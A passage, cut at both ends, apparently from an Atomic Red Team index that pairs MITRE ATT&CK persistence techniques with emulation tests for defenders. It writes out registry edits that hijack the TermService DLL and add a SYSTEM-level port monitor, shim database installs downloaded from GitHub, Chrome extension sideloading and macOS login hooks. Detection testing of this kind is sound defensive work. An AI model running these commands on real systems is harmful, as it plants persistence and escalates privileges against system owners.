$registryPath = "HKLM:\System\CurrentControlSet\services\TermService\Parameters"
# Check if the registry key exists
if (Test-Path -Path $registryPath) {
# Modify the ServiceDll value in the registry
Set-ItemProperty -Path $registryPath -Name "ServiceDll" -Value $newServiceDll
Write-Host "ServiceDll value in the registry has been updated to: $newServiceDll"
} else {
Write-Host "Registry key not found. Make sure the 'TermService\Parameters' key exists."
}
cleanup_command: Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\services\TermService\Parameters"
-Name "ServiceDll" -Value "C:\Windows\System32\termsrv.dll"
name: powershell
T1176:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8
created: '2018-01-16T16:13:52.465Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1176
external_id: T1176
- source_name: Abramovsky VSCode Security
description: 'Abramovsky, O. (2023, May 16). VSCode Security: Malicious Extensions
Detected- More Than 45,000 Downloads- PII Exposed, and Backdoors Enabled.
Retrieved March 30, 2025.'
url: https://blog.checkpoint.com/securing-the-cloud/malicious-vscode-extensions-with-more-than-45k-downloads-steal-pii-and-enable-backdoors/
- source_name: xorrior chrome extensions macOS
description: Chris Ross. (2019, February 8). No Place Like Chrome. Retrieved
April 27, 2021.
url: https://www.xorrior.com/No-Place-Like-Chrome/
- source_name: Chrome Extension C2 Malware
description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
get hacked by a Chrome extension. Retrieved September 12, 2024.'
url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:39.525Z'
name: Browser Extensions
description: "Adversaries may abuse software extensions to establish persistent
access to victim systems. Software extensions are modular components that
enhance or customize the functionality of software applications, including
web browsers, Integrated Development Environments (IDEs), and other platforms.(Citation:
Chrome Extension C2 Malware)(Citation: Abramovsky VSCode Security) Extensions
are typically installed via official marketplaces, app stores, or manually
loaded by users, and they often inherit the permissions and access levels
of the host application. \n\n \nMalicious extensions can be introduced through
various methods, including social engineering, compromised marketplaces, or
direct installation by users or by adversaries who have already gained access
to a system. Malicious extensions can be named similarly or identically to
benign extensions in marketplaces. Security mechanisms in extension marketplaces
may be insufficient to detect malicious components, allowing adversaries to
bypass automated scanners or exploit trust established during the installation
process. Adversaries may also abuse benign extensions to achieve their objectives,
such as using legitimate functionality to tunnel data or bypass security controls.
\n\nThe modular nature of extensions and their integration with host applications
make them an attractive target for adversaries seeking to exploit trusted
software ecosystems. Detection can be challenging due to the inherent trust
placed in extensions during installation and their ability to blend into normal
application workflows. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
- Justin Warner, ICEBRG
- Manikantan Srinivasan, NEC Corporation India
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '2.0'
identifier: T1176
atomic_tests:
- name: Chrome/Chromium (Developer Mode)
auto_generated_guid: 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1
description: Turn on Chrome/Chromium developer mode and Load Extension found
in the src directory
supported_platforms:
- linux
- windows
- macos
executor:
steps: |
1. Navigate to [chrome://extensions](chrome://extensions) and
tick 'Developer Mode'.
2. Click 'Load unpacked extension...' and navigate to
[Browser_Extension](../t1176/src/)
3. Click 'Select'
name: manual
- name: Firefox
auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938
description: 'Create a file called test.wma, with the duration of 30 seconds
'
supported_platforms:
- linux
- windows
- macos
executor:
steps: |
1. Navigate to [about:debugging](about:debugging) and
click "Load Temporary Add-on"
2. Navigate to [manifest.json](./src/manifest.json)
3. Then click 'Open'
name: manual
- name: Edge Chromium Addon - VPN
auto_generated_guid: 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5
description: 'Adversaries may use VPN extensions in an attempt to hide traffic
sent from a compromised host. This will install one (of many) available VPNS
in the Edge add-on store.
'
supported_platforms:
- windows
- macos
executor:
steps: |
1. Navigate to https://microsoftedge.microsoft.com/addons/detail/fjnehcbecaggobjholekjijaaekbnlgj
in Edge Chromium
2. Click 'Get'
name: manual
- name: Google Chrome Load Unpacked Extension With Command Line
auto_generated_guid: 7a714703-9f6b-461c-b06d-e6aeac650f27
description: |-
This test loads an unpacked extension in Google Chrome with the `--load-extension` parameter. This technique was previously used by the Grandoreiro malware to load a malicious extension that would capture the browsing history, steal cookies and other user information. Other malwares also leverage this technique to hijack searches, steal passwords, inject ads, and more.
References:
https://attack.mitre.org/techniques/T1176/
https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/
supported_platforms:
- windows
input_arguments:
working_dir:
description: Working directory where the files will be downloaded and extracted
type: string
default: "$env:TEMP"
executor:
command: |2-
# Chromium
$chromium = "https://commondatastorage.googleapis.com/chromium-browser-snapshots/Win_x64/1153778/chrome-win.zip"
# uBlock Origin Lite to test side-loading
$extension = "https://github.com/uBlockOrigin/uBOL-home/releases/download/uBOLite_2024.11.25.1376/uBOLite_2024.11.25.1376.chromium.mv3.zip"
Set-Location "#{working_dir}"
Set-Variable ProgressPreference SilentlyContinue
Invoke-WebRequest -URI $chromium -OutFile "#{working_dir}\chrome.zip"
Invoke-WebRequest -URI $extension -OutFile "#{working_dir}\extension.zip"
Expand-Archive chrome.zip -DestinationPath "#{working_dir}" -Force
Expand-Archive extension.zip -Force
Start-Process .\chrome-win\chrome.exe --load-extension="#{working_dir}\extension\" -PassThru
cleanup_command: |-
Set-Location "#{working_dir}"
Stop-Process -Name chrome -Force
Remove-Item .\chrome.zip, .\chrome-win, .\extension, .\extension.zip -Recurse -Force
Set-Variable ProgressPreference Continue
name: powershell
elevation_required: true
T1137.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
created: '2019-11-07T20:00:25.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1137/005
external_id: T1137.005
- source_name: Pfammatter - Hidden Inbox Rules
description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
Microsoft Exchange. Retrieved October 12, 2021.
url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- source_name: Microsoft Detect Outlook Forms
description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
4, 2019.
url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- source_name: SilentBreak Outlook Rules
description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
February 4, 2019.
url: https://silentbreaksecurity.com/malicious-outlook-rules/
- source_name: SensePost NotRuler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
url: https://github.com/sensepost/notruler
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Security
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Office Suite
x_mitre_version: '1.2'
atomic_tests: []
T1098.007:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
created: '2024-08-05T20:49:49.809Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1098/007
external_id: T1098.007
- source_name: Cyber Security News
description: Kaaviya. (n.d.). SuperBlack Actors Exploiting Two Fortinet Vulnerabilities
to Deploy Ransomware. Retrieved September 22, 2025.
url: https://cybersecuritynews.com/superblack-actors-exploiting-two-fortinet-vulnerabilities/
- source_name: Linux Usermod
description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
- source_name: Microsoft Net Group
description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
2024.
url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
- source_name: Microsoft Net Localgroup
description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
5, 2024.
url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
- source_name: Microsoft RDP Logons
description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
Services. Retrieved August 5, 2024.
url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
- source_name: RootDSE AD Detection 2022
description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
Active Directory environments. Retrieved August 5, 2024.
url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-09-26T18:25:02.290Z'
name: Additional Local or Domain Groups
description: "An adversary may add additional local or domain groups to an adversary-controlled
account to maintain persistent access to a system or domain.\n\nOn Windows,
accounts may use the `net localgroup` and `net group` commands to add existing
users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
added to the local administrators group on Windows devices to maintain elevated
privileges. They may also be added to the Remote Desktop Users group, which
allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
to log into the endpoints in the future.(Citation: Microsoft RDP Logons) Adversaries
may also add accounts to VPN user groups to gain future persistence on the
network.(Citation: Cyber Security News) On Linux, accounts may be added to
the sudoers group, allowing them to persistently leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
for elevated privileges. \n\nIn Windows environments, machine accounts may
also be added to domain groups. This allows the local SYSTEM account to gain
privileges on the domain.(Citation: RootDSE AD Detection 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- macOS
- Linux
x_mitre_version: '1.1'
atomic_tests: []
T1546.011:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83
created: '2020-01-24T14:56:24.231Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/011
external_id: T1546.011
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: FireEye Application Shimming
description: Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved
May 4, 2020.
url: http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf
- source_name: Black Hat 2015 App Shim
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
url: https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:42.703Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
Windows Application Compatibility Infrastructure/Framework (Application Shim)
was created to allow for backward compatibility of software as the operating
system codebase changes over time. For example, the application shimming feature
allows developers to apply fixes to applications (without rewriting code)
that were created for Windows XP so that it will work with Windows 10. (Citation:
Elastic Process Injection July 2017)\n\nWithin the framework, shims are created
to act as a buffer between the program (or more specifically, the Import Address
Table) and the Windows OS. When a program is executed, the shim cache is referenced
to determine if the program requires the use of the shim database (.sdb).
If so, the shim database uses hooking to redirect the code as necessary in
order to communicate with the OS. \n\nA list of all shims currently installed
by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb
and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom
databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom
and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo
keep shims secure, Windows designed them to run in user mode so they cannot
modify the kernel and you must have administrator privileges to install a
shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)
(UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data
Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH),
and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims
may allow an adversary to perform several malicious acts such as elevate privileges,
install backdoors, disable defenses like Windows Defender, etc. (Citation:
FireEye Application Shimming) Shims can also be abused to establish persistence
by continuously being invoked by affected programs."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1546.011
atomic_tests:
- name: Application Shim Installation
auto_generated_guid: 9ab27e22-ee62-4211-962b-d36d9a0e6a18
description: "Install a shim database. This technique is used for privilege
escalation and bypassing user access control.\nUpon execution, \"Installation
of AtomicShim complete.\" will be displayed. To verify the shim behavior,
run \nthe AtomicTest.exe from the \\\\T1546.011\\\\bin
directory. You should see a message box appear\nwith \"Atomic Shim DLL Test!\"
as defined in the AtomicTest.dll. To better understand what is happening,
review\nthe source code files is the \\\\T1546.011\\\\src
directory.\n"
supported_platforms:
- windows
input_arguments:
file_path:
description: Path to the shim database file
type: string
default: PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb
dependency_executor_name: powershell
dependencies:
- description: 'Shim database file must exist on disk at specified location
(#{file_path})
'
prereq_command: 'if (Test-Path "#{file_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory (split-path "#{file_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}"
- description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll
'
prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit
1}
'
get_prereq_command: |
New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll
executor:
command: 'sdbinst.exe "#{file_path}"
'
cleanup_command: 'sdbinst.exe -u "#{file_path}" >nul 2>&1
'
name: command_prompt
elevation_required: true
- name: New shim database files created in the default shim database directory
auto_generated_guid: aefd6866-d753-431f-a7a4-215ca7e3f13d
description: |
Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
supported_platforms:
- windows
executor:
command: |
Copy-Item "$PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb" C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb
Copy-Item "$PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb" C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb
cleanup_command: |
Remove-Item C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb -ErrorAction Ignore
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Registry key creation and/or modification events for SDB
auto_generated_guid: 9b6a06f9-ab5e-4e8d-8289-1df4289db02f
description: |
Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing
the registry keys that were created. These keys can also be viewed using the Registry Editor.
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
supported_platforms:
- windows
executor:
command: |
New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011"
New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011"
cleanup_command: |
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore
name: powershell
elevation_required: true
T1547.010:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe
created: '2020-01-24T19:46:27.750Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/010
external_id: T1547.010
- source_name: Bloxham
description: Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
2024.
url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:42.872Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
can be set through the AddMonitor API call to set a DLL to be
loaded at startup.(Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32
and will be loaded and run by the print spooler service, `spoolsv.exe`, under
SYSTEM level permissions on boot.(Citation: Bloxham) \n\nAlternatively, an
arbitrary DLL can be loaded if permissions allow writing a fully-qualified
pathname for that DLL to the `Driver` value of an existing or new arbitrarily
named subkey of HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors.
The Registry key contains entries for the following:\n\n* Local Port\n* Standard
TCP/IP Port\n* USB Monitor\n* WSD Port\n"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Stefan Kanthak
- Travis Smith, Tripwire
- Harun Küßner
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.3'
identifier: T1547.010
atomic_tests:
- name: Add Port Monitor persistence in Registry
auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50
description: Add key-value pair to a Windows Port Monitor registry. On the subsequent
reboot DLL will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege.
supported_platforms:
- windows
input_arguments:
monitor_dll:
description: Addition to port monitor registry key. Normally refers to a
DLL name in C:\Windows\System32 but an arbitrary DLL can be specified
with the absolute path.
type: path
default: "$PathToAtomicsFolder\\T1547.010\\bin\\PortMonitor.dll"
executor:
command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam"
/v "Driver" /d "#{monitor_dll}" /t REG_SZ /f
'
cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam"
/f >nul 2>&1
'
name: command_prompt
elevation_required: true
T1037.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--43ba2b05-cf72-4b6c-8243-03a4aba41ee0
created: '2020-01-10T16:01:15.995Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1037/002
external_id: T1037.002
- source_name: Login Scripts Apple Dev
description: Apple. (2016, September 13). Customizing Login and Logout. Retrieved
April 1, 2022.
url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html
- source_name: LoginWindowScripts Apple Dev
description: Apple. (n.d.). LoginWindowScripts. Retrieved April 1, 2022.
url: https://developer.apple.com/documentation/devicemanagement/loginwindowscripts
- source_name: Wardle Persistence Chapter
description: 'Patrick Wardle. (n.d.). Chapter 0x2: Persistence. Retrieved
April 13, 2022.'
url: https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf
- source_name: S1 macOs Persistence
description: Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved
March 27, 2020.
url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:42.963Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
description: "Adversaries may use a Login Hook to establish persistence executed
upon user logon. A login hook is a plist file that points to a specific script
to execute with root privileges upon user logon. The plist file is located
in the /Library/Preferences/com.apple.loginwindow.plist file
and can be modified using the defaults command-line utility.
This behavior is the same for logout hooks where a script can be executed
upon user logout. All hooks require administrator permissions to modify or
create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts
Apple Dev) \n\nAdversaries can add or insert a path to a malicious script
in the com.apple.loginwindow.plist file, using the LoginHook
or LogoutHook key-value pair. The malicious script is executed
upon the next user login. If a login hook already exists, adversaries can
add additional commands to an existing login hook. There can be only one login
and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '2.0'
identifier: T1037.002
atomic_tests:
- name: Logon Scripts - Mac
auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4
description: 'Mac logon script
'
supported_platforms:
- macos
executor:
steps: "1. Create the required plist file\n\n sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist\n\n2.
Populate the plist with the location of your shell script\n\n sudo defaults
write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n\n3.
Create the required plist file in the target user's Preferences directory\n\n\t
\ touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist\n\n4.
Populate the plist with the location of your shell script\n\n\t defaults
write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n"
name: manual
T1205:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c
created: '2018-04-18T17:59:24.739Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1205
external_id: T1205
- source_name: Bleeping Computer - Ryuk WoL
description: Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan
To Encrypt Offline Devices. Retrieved February 11, 2021.
url: https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/
- source_name: AMD Magic Packet
description: AMD. (1995, November 1). Magic Packet Technical White Paper.
Retrieved February 17, 2021.
url: https://www.amd.com/system/files/TechDocs/20213.pdf
- source_name: Mandiant - Synful Knock
description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful
Knock - A Cisco router implant - Part I. Retrieved November 17, 2024.
url: https://cloud.google.com/blog/topics/threat-intelligence/synful-knock-acis/
- source_name: Cisco Synful Knock Evolution
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
- source_name: Hartrell cd00r 2002
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
- source_name: Cisco Blog Legacy Device Attacks
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
- source_name: GitLab WakeOnLAN
description: Perry, David. (2020, August 11). WakeOnLAN (WOL). Retrieved February
17, 2021.
url: https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:43.225Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.
Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
